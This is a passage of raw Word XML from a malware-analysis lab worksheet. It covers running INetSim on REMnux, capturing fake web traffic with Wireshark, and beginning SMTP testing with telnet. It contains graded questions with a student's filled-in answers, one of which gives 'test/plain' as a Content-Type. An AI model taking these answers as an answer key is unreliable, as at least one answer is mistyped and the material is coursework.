    </w:p>
    <w:p w14:paraId="23C8FEA7" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service chargen_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE200F" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service chargen_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480E606" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRPr="00581DF1" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service dummy_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30053059" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DF1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>#start_service dummy_udp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555033AA" w14:textId="77777777" w:rsidR="006A0488" w:rsidRDefault="006A0488" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DAD26F" w14:textId="21E79A90" w:rsidR="006A0488" w:rsidRPr="000C1E63" w:rsidRDefault="006A0488" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0488">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>To in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">voke </w:t>
      </w:r>
      <w:r w:rsidR="000C1E63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">INETSim, open a terminal on your REMnux machine and type </w:t>
      </w:r>
      <w:r w:rsidR="000C1E63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inetsim </w:t>
      </w:r>
      <w:r w:rsidR="000C1E63">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">then press enter. It will load the services in your terminal and remain active until you close the window. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C9AB3" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="510BFF36" w14:textId="77777777" w:rsidR="00C615B2" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Recording command and control connections is vital to the analysis process. This can be done using Wireshark, which is installed on R</w:t>
      </w:r>
      <w:r w:rsidR="00C615B2">
        <w:t>EM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nux by default. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67B319" w14:textId="40FC1531" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Open Wireshark by</w:t>
      </w:r>
      <w:r w:rsidR="00C615B2">
        <w:t xml:space="preserve"> opening a terminal and typing </w:t>
      </w:r>
      <w:r w:rsidR="00C615B2" w:rsidRPr="00C615B2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E9967" w14:textId="6582ECCA" w:rsidR="007F0FFE" w:rsidRDefault="00C615B2" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Click</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="006910DC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193DC43F" wp14:editId="719E5237">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="../../../../../../Desktop/start-new-liv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tart-new-live-captur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8008" t="28956" r="61365" b="55201"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="190500" cy="1905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6910DC">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:r w:rsidR="006910DC">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t>new live capture</w:t>
      </w:r>
      <w:r w:rsidR="006910DC">
        <w:t>) button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097B942" w14:textId="683BB1BF" w:rsidR="007F0FFE" w:rsidRDefault="00F11DDC" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Wireshark begins</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> capturing network traffic that is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t>sent to your R</w:t>
      </w:r>
      <w:r>
        <w:t>EM</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t>nux instance</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01A5AF" w14:textId="77777777" w:rsidR="00ED273E" w:rsidRDefault="00ED273E" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67AB0A32" w14:textId="28FA84AF" w:rsidR="007F0FFE" w:rsidRDefault="00F11DDC" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> your Windows analysis machine, open a web browser and </w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> any website address, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">such as the one </w:t>
      </w:r>
      <w:r w:rsidR="008643DD">
        <w:t>shown in Figure 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2FC41" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EC695C" wp14:editId="72590349">
            <wp:extent cx="3617764" cy="721386"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="3" name="Picture 3" descr="../../../../../../Desktop/custom-htt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ustom-http-respons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42537"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3788728" cy="75547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8840628" w14:textId="282D04BB" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="000537E5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Default HTML Page Response from Fake Website Visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BECFD62" w14:textId="43DFF7A6" w:rsidR="007F0FFE" w:rsidRDefault="00F11DDC" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2016. </w:t>
      </w:r>
      <w:r w:rsidR="002E6E3D" w:rsidRPr="002E6E3D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC14BB3" w14:textId="4D21586F" w:rsidR="007F0FFE" w:rsidRDefault="002A1460" w:rsidP="000C1E63">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve">he response returned is a custom INetSim HTML page. </w:t>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:t>Us</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t>ing Wireshark</w:t>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> you can see that TCP connections and</w:t>
      </w:r>
      <w:r w:rsidR="008643DD">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="007F0FFE">
        <w:t xml:space="preserve"> HTTP GET request were recorded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B820D96" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002C011A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543B7FEE" wp14:editId="59A53333">
            <wp:extent cx="4667534" cy="965422"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4" name="Picture 4" descr="../../../../../../Desktop/wireshark-capture-htt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ireshark-capture-http-respon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4719" cy="971045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FFB33" w14:textId="47E923F9" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00ED273E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000537E5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>apture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0045E828" w14:textId="0E4CA5D1" w:rsidR="00F11DDC" w:rsidRDefault="00F11DDC" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="810" w:right="900"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="0044631B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2016. </w:t>
      </w:r>
      <w:r w:rsidR="002C011A" w:rsidRPr="002C011A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reproduced and used in accordance with the fair dealing provisions in section 29 of the Canadian Copyright Act for the purposes of education, research or private study. Further distribution may infringe copyright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264A6DA" w14:textId="0BFDD541" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="SAITCaption"/>
        <w:spacing w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A61AC13" w14:textId="5615D2E9" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark provides a </w:t>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:t>variety</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of analyzers for network protocols, which can provide great insight into various aspects of command and control communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50131531" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3ACE95" w14:textId="7D13EBC3" w:rsidR="00F11DDC" w:rsidRPr="00F11DDC" w:rsidRDefault="00F11DDC" w:rsidP="002C011A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:ind w:left="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11DDC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0720CCCD" w14:textId="7624AEA9" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB777F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header from the HTTP/1.1 200 OK response from the server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D7957" w14:textId="0BF35D1F" w:rsidR="007F0FFE" w:rsidRPr="00E3721C" w:rsidRDefault="007F0FFE" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6D04C02A" w14:textId="7E14101A" w:rsidR="007F0FFE" w:rsidRPr="00D04231" w:rsidRDefault="00D04231" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server: INetSim HTTP Server\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EED60" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="61F52BC1" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="285EA3F5" w14:textId="334ED072" w:rsidR="007F0FFE" w:rsidRPr="00E3721C" w:rsidRDefault="007F0FFE" w:rsidP="00E3721C"/>
    <w:p w14:paraId="51C4C3DF" w14:textId="719F8219" w:rsidR="007F0FFE" w:rsidRPr="00E3721C" w:rsidRDefault="007F0FFE" w:rsidP="00E3721C"/>
    <w:p w14:paraId="53614812" w14:textId="3E20A78C" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP response header from the HTTP/1.1 200 OK response from the server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFD35E" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="375CB5EF" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="7ABC642B" w14:textId="7F8A56CD" w:rsidR="00E3721C" w:rsidRPr="00EF4450" w:rsidRDefault="00EF4450" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Type: test/plain\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285BB75D" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="61963A6F" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="5B4C9162" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="28052431" w14:textId="0C955245" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What is the TCP sequence number of the HTTP/1.1 200 OK response? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23724D5F" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="730EF725" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="202C4B24" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="5E4B71ED" w14:textId="30A440AE" w:rsidR="00E3721C" w:rsidRPr="00EF4450" w:rsidRDefault="00EF4450" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sequence Number: 151           (relative sequence number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E86BD" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="3863BAE1" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="30BD9C41" w14:textId="5E3E5243" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="00D659F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
          <w:bar w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Were any other resources requested by your browser from the HTTP server? If so, what were they, and why</w:t>
      </w:r>
      <w:r w:rsidR="00F11DDC">
        <w:t xml:space="preserve"> were they requested</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650528BF" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00D659F2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F90D84" w14:textId="7BF9B298" w:rsidR="00E3721C" w:rsidRPr="00C16C0A" w:rsidRDefault="00C16C0A" w:rsidP="00E3721C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not that I can see</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A884A89" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="79A02B7A" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="10B0F2FD" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="6F669D90" w14:textId="77777777" w:rsidR="00E3721C" w:rsidRPr="00E3721C" w:rsidRDefault="00E3721C" w:rsidP="00E3721C"/>
    <w:p w14:paraId="7610BA06" w14:textId="77777777" w:rsidR="007F0FFE" w:rsidRDefault="007F0FFE" w:rsidP="00F11DDC">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214FB368" w14:textId="5F412B9C" w:rsidR="002B07D5" w:rsidRDefault="00F11DDC" w:rsidP="00F11DDC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00F11DDC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Instructor sign-off:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225DBB62" w14:textId="671913A9" w:rsidR="00F11DDC" w:rsidRDefault="005927A0" w:rsidP="002E6E3D">
      <w:pPr>
        <w:pStyle w:val="HeadingStyle1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc24514475"/>
      <w:r>
        <w:t>SMTP Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="27281835" w14:textId="3361AD74" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>INetSim also provides SMTP service emulation. This is useful for malware that may attempt to connect to mail servers to send e-mails varying in purpose, including sending command and control information back to the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00136FA6">
        <w:t xml:space="preserve"> Your Windows machine may need a telnet client to compete this test. Press Win key and type Features. Click the Programs and Features utility and scroll down to Telnet Client. Check the box, press OK and a telnet client will install on your workstation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AB3B8" w14:textId="15335F33" w:rsidR="005927A0" w:rsidRDefault="005927A0" w:rsidP="00522042">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Test this by connecting to the service using telnet</w:t>
      </w:r>
      <w:r w:rsidR="005E1D3E">
        <w:t xml:space="preserve"> *Note you will need to use your own IP address configuration for this</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
